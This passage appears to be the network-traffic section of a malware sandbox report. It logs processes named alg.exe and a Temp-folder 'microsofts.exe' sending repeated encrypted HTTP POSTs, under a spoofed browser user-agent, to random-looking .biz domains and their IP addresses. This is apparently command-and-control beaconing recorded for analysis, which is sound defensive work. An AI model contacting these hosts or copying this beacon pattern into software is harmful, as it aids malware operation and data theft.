                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:54.912357092 CEST778OUTData Raw: 55 35 3c a3 a9 db a8 88 fe 02 00 00 91 1d 7c 88 c6 a9 e9 02 c1 f5 11 4d 0b 6e 4b df a5 0a c0 0b fd 63 0c 1c 7e c6 1b 25 52 2d 25 b0 78 58 9e 19 6d 0a c7 32 2b 01 9b 6b a5 9b 27 6b 77 40 8c d7 83 a8 77 29 46 4a 7f 26 c5 31 28 bf d4 9f 0f 85 8b a0
                                                                                                                                                                                                                                                                                                          Data Ascii: U5<|MnKc~%R-%xXm2+k'kw@w)FJ&1(19nmS>@ym{JlFwBX;vX95:!4Kt{"Z(m6[;V=;zFz%a,mF2zZ,xf#3[i5p6~< t


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          18192.168.2.54988282.112.184.197807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.014811993 CEST355OUTPOST /vpujdohccl HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:57.014832020 CEST778OUTData Raw: 53 3b 28 e5 cd ab 80 20 fe 02 00 00 c2 b0 08 49 57 9f 03 b8 a6 de d7 2b 81 21 fa c5 a9 98 19 53 21 c2 2f 02 06 5f 24 d9 01 cf a2 d9 03 56 ba 81 46 82 45 a4 37 28 dc 9a b5 9a 94 e3 92 be 13 82 65 9c 67 94 3a b4 23 a5 99 87 17 4a 9f e2 83 51 95 53
                                                                                                                                                                                                                                                                                                          Data Ascii: S;( IW+!S!/_$VFE7(eg:#JQS<g>^fDn*mm$>&BW`-:Ei`Q3-V{U|1s2czt]RKFGfr+{=(H/.]nP#3'zg7[NhI


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          19192.168.2.54990582.112.184.197807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.009949923 CEST357OUTPOST /gocchgnxicko HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.009949923 CEST778OUTData Raw: db 5a b9 36 67 8c e1 c2 fe 02 00 00 a7 4b ad f5 c3 9c 09 8c b8 71 93 de ea 0a 72 bc 0a 25 e6 18 fc 05 d0 b4 75 31 ce 95 33 51 7c 2d 54 f0 ec 44 a5 3e ca 67 30 51 25 0c 21 eb 62 92 6e 65 38 b2 d7 87 93 d6 9e ef 0f af 2c 19 ff 85 10 d5 48 a4 40 59
                                                                                                                                                                                                                                                                                                          Data Ascii: Z6gKqr%u13Q|-TD>g0Q%!bne8,H@YNr\'J@4.#ct$qrF}y_QY0N)OyLRfn$1m7W[+TlDOe$:v;9CtYwu#fbM}rdMto5N


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          20192.168.2.54990682.112.184.19780576C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.041970968 CEST358OUTPOST /mnoqnjatopaha HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vjaxhpbji.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 828
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:01.041970968 CEST828OUTData Raw: 5c ee 8a ae 88 96 45 9d 30 03 00 00 a7 b6 eb bf 4d e1 76 65 fc 14 b0 89 12 82 24 8d 0f 9e 19 36 8c b3 61 24 ed 44 e0 df 9d 68 a6 e8 2e ef 17 fd fb b2 a6 ed 71 87 f1 ea 13 c2 a3 a3 6d e5 bb 4f 4a 1d f5 66 3c 0d 53 93 24 de e1 44 bd f4 7d 3c 23 58
                                                                                                                                                                                                                                                                                                          Data Ascii: \E0Mve$6a$Dh.qmOJf<S$D}<#XRZJ6AzlVZNR:v16uFR]91G=4!Qr8lY90vtKJUesZ4''n~n|euHX'2


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          21192.168.2.54992947.129.31.212807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.983599901 CEST352OUTPOST /hqlbcdtcv HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: xlfhhhm.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:04.983599901 CEST778OUTData Raw: 8e 2f 39 47 ce 98 cc 67 fe 02 00 00 97 14 7b 62 08 9b 46 f0 be b8 ba c0 08 4f bb a9 75 8f 2e 5f 13 c2 42 69 49 e6 26 9f cc 4e 48 50 e9 be 96 78 2d 81 1f 84 33 71 e1 df 23 a0 7c 17 5e bd ec b1 01 be 70 0c 74 9c b0 1e 71 ec 51 5e f1 5a 5e bb e6 e2
                                                                                                                                                                                                                                                                                                          Data Ascii: /9Gg{bFOu._BiI&NHPx-3q#|^ptqQ^Z^9l/V{0hff8IDv4w4emC;kTJ4g:0PP<|pWx[|6H-_DIm{yx2+Rewn/IJT
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.318619013 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:06 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=4023c7f5edf00b65daabb56de8caa952|8.46.123.33|1728547686|1728547686|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          22192.168.2.54994213.251.16.150807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.546219110 CEST346OUTPOST /fymj HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: ifsaia.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:06.546253920 CEST778OUTData Raw: 12 11 4f d5 b3 3d de 28 fe 02 00 00 2f 96 fd 66 19 c0 5c c0 ea c3 f0 ab fb f1 70 6e 4b 3d b1 b2 4d 7a 09 24 09 bb d0 43 af 0f 3f 33 d8 74 ff b4 72 e1 1b 5f cc 3d 18 81 0a 09 1a 3c a6 95 ae 63 11 bc 0d 57 ec 5a af ec 4d f3 a9 a9 c0 79 80 47 83 e4
                                                                                                                                                                                                                                                                                                          Data Ascii: O=(/f\pnK=Mz$C?3tr_=<cWZMyGB$RriPsW$\gB]>"6#s6Hs[Fnv %sO-x/|dU^C7{eTf$=Zm#a{V-q3NqI K=4S!EWx
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:07.906459093 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:07 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=fdc7958316f7f82cf896377978fc8b65|8.46.123.33|1728547687|1728547687|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          23192.168.2.54995444.221.84.105807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.193072081 CEST355OUTPOST /wbpbmvhlbk HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.193104029 CEST778OUTData Raw: 7d 39 88 43 8a 01 aa b3 fe 02 00 00 ff 32 25 32 c9 28 5c c2 39 32 30 bf 0b 44 88 7e 4b 6d 44 30 c4 ab 4a 9d 79 95 94 21 c7 cd 5f 80 e1 42 60 59 d5 b7 ac 09 0a 10 ee 3e f8 88 95 3e f5 0b c3 c3 5a 59 b1 d2 af 6e 00 a0 4b 10 47 88 9b 89 77 c1 41 2e
                                                                                                                                                                                                                                                                                                          Data Ascii: }9C2%2(\920D~KmD0Jy!_B`Y>>ZYnKGwA.ujO4H`\/(gu#fgbdxNLN3@JKvK.%F7/f3?qkq9sZL5x]{*ZqH:m%kB9W*I
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:08.680147886 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:08 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=b948bb3605f26d1d18e0611c64a146aa|8.46.123.33|1728547688|1728547688|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          24192.168.2.54996018.141.10.107807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.644643068 CEST348OUTPOST /qohnd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:09.644656897 CEST778OUTData Raw: ec aa c9 52 37 7d 7c f5 fe 02 00 00 fa c3 24 17 11 40 a1 13 06 d9 08 4a 1b 82 41 73 72 72 aa 87 a2 04 17 bf bd 20 b5 86 16 20 f6 d4 56 d5 f7 42 f7 85 87 15 19 18 d9 52 f5 bf dd cd 8e 75 2e 00 47 3e 6f 12 ff c6 ad ed 4f bd 01 89 db da 71 20 41 22
                                                                                                                                                                                                                                                                                                          Data Ascii: R7}|$@JAsrr VBRu.G>oOq A"w8Zz5jy[{Eb/)?d=8c-[_!RBD:xzU[{D?2cu5.c*fLhhR}J_a"['59O#
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:10.993830919 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:10 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=12a427fb942f650e67033fa3352542c2|8.46.123.33|1728547690|1728547690|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          25192.168.2.549972172.234.222.143807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.208393097 CEST347OUTPOST /dvejgi HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.208430052 CEST778OUTData Raw: 3f 4e 63 0d 44 2e 33 88 fe 02 00 00 7b ea 52 a3 ff bc 2e 09 54 39 4b eb 4f 6a fc df aa f3 1e cc 32 b7 f9 6d e7 69 3f 30 22 91 e6 38 e2 69 1b eb 38 bb e7 de 84 eb 1a 68 f3 ca fe 98 9c 3e ce 2f 56 1a 8a fd 2c 3b 5b 0c 23 92 4e 11 48 f7 81 96 b3 55
                                                                                                                                                                                                                                                                                                          Data Ascii: ?NcD.3{R.T9KOj2mi?0"8i8h>/V,;[#NHUOfAu;+Ka |WVGX`E/v_7SFmClu1~#6nn''Xs_qE$Y2hw<#C7FP6v; MU$2"S# C


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          26192.168.2.549978172.234.222.143807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.965732098 CEST353OUTPOST /kadnnjikurdd HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:11.965732098 CEST778OUTData Raw: 1b 2e 30 e9 2e 00 d6 e2 fe 02 00 00 dc 0e 9f bf 74 be 8b 32 7f b1 39 aa 1c 46 c1 37 3d d4 be 61 68 32 ea 24 43 d7 3a 0d 65 cb bf 1b 2c 10 f8 18 29 fe db 4c 16 26 a2 10 a4 65 77 60 43 e0 64 54 33 4b 24 02 20 e6 f5 c7 e0 a3 0c 61 ce b4 9c 5e 9d cd
                                                                                                                                                                                                                                                                                                          Data Ascii: .0.t29F7=ah2$C:e,)L&ew`CdT3K$ a^0bC]7[$sFu$k4GeZ}O ycMxK'73/Wp,zO|]lS,p7-)xp"|iz'bsn/F


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          27192.168.2.54998434.246.200.160807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.755316973 CEST351OUTPOST /mngdwptvi HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.755337954 CEST778OUTData Raw: 8e 69 f6 a6 7f 68 be 3d fe 02 00 00 41 f7 70 57 16 13 5c 94 c3 0f 60 d8 a9 87 f0 83 53 97 27 cb e2 41 3f 80 3e 99 c1 74 21 6b 50 38 aa 32 2f 53 02 6d 0f 50 ec f1 8f 78 8a 9b 72 e8 c1 c9 60 c5 39 f0 03 95 e8 d4 24 8d 93 23 12 33 06 5c c9 ae 8a 03
                                                                                                                                                                                                                                                                                                          Data Ascii: ih=ApW\`S'A?>t!kP82/SmPxr`9$#3\q!cEpWlGZCMn%|L[CK8xMo *krQ$Rhv!P=]z5w]v%\v3H{^*WY/A$}cQ/&pt&:,<<D


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          28192.168.2.54998534.246.200.160807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.903084993 CEST349OUTPOST /qqxxgql HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: tbjrpv.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:12.903117895 CEST778OUTData Raw: a6 d5 93 24 02 e7 27 4e fe 02 00 00 e3 5f 21 6c 14 5a a7 0b 71 3c eb 78 bb 44 ee 87 3d 86 71 40 d3 0a 74 bc 06 4f a0 ed 9b 6d 96 6e d6 53 73 bd fe 2a 88 a3 df 1a 7a 54 72 2e 5c 0e 3a d9 53 75 73 7a 33 d8 14 e1 08 96 7a 53 7d 75 13 f9 ea 4d 09 23
                                                                                                                                                                                                                                                                                                          Data Ascii: $'N_!lZq<xD=q@tOmnSs*zTr.\:Susz3zS}uM#[Zm%J*;2|,!-BhZ>COGhLY&rk\1|0@I*Z`Gmz0b.,-hok445+{
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:13.663165092 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:13 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=41ffbe5bfc2a4de03a461efa9255725f|8.46.123.33|1728547693|1728547693|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          29192.168.2.54999218.208.156.248807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:13.898920059 CEST351OUTPOST /sgbnffiuqo HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: deoci.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:13.898957014 CEST778OUTData Raw: fb 9e 71 34 e6 d0 43 c7 fe 02 00 00 fc 8f b9 1d b8 7f 2b 46 d6 80 a8 dd 46 c8 96 fc a7 84 eb 42 cb e1 2a 79 8f 24 d7 15 fd 62 74 20 d8 57 96 8a cb 6a 9e 5b 7d 94 c9 14 db 91 72 6a 56 55 2e 9d 4a 83 e5 94 11 5c fb cd 80 e4 65 79 96 3b cf 5d f0 f4
                                                                                                                                                                                                                                                                                                          Data Ascii: q4C+FFB*y$bt Wj[}rjVU.J\ey;]`HNr*EXb'*mVnsR\Is?M^*e(VH!u@Iey8g0nH_}x{fbW&A=bV%y7.
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:14.383069038 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                          Date: Thu, 10 Oct 2024 08:08:14 GMT
                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                          Set-Cookie: btst=0e184ce44427340c1c5e1b1625d6bb8a|8.46.123.33|1728547694|1728547694|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                          30192.168.2.549998208.100.26.245807120C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:14.739132881 CEST346OUTPOST /ly HTTP/1.1
                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                          Host: gytujflc.biz
                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                          Content-Length: 778
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:14.739180088 CEST778OUTData Raw: 8b fe df fc 1a 54 19 df fe 02 00 00 02 87 5c 7c 02 e0 83 eb 87 47 6b ab b0 5c 8a 53 24 bb 6f fa 2d 1c 5c 70 65 05 43 4a 2f ec 86 2a b5 7c 13 3d 83 0e 16 f3 df 37 f2 3b 02 e9 c0 80 9e 9c 22 9e 34 35 e3 70 7f 02 c7 15 08 7e 6d 68 1b af a9 15 04 88
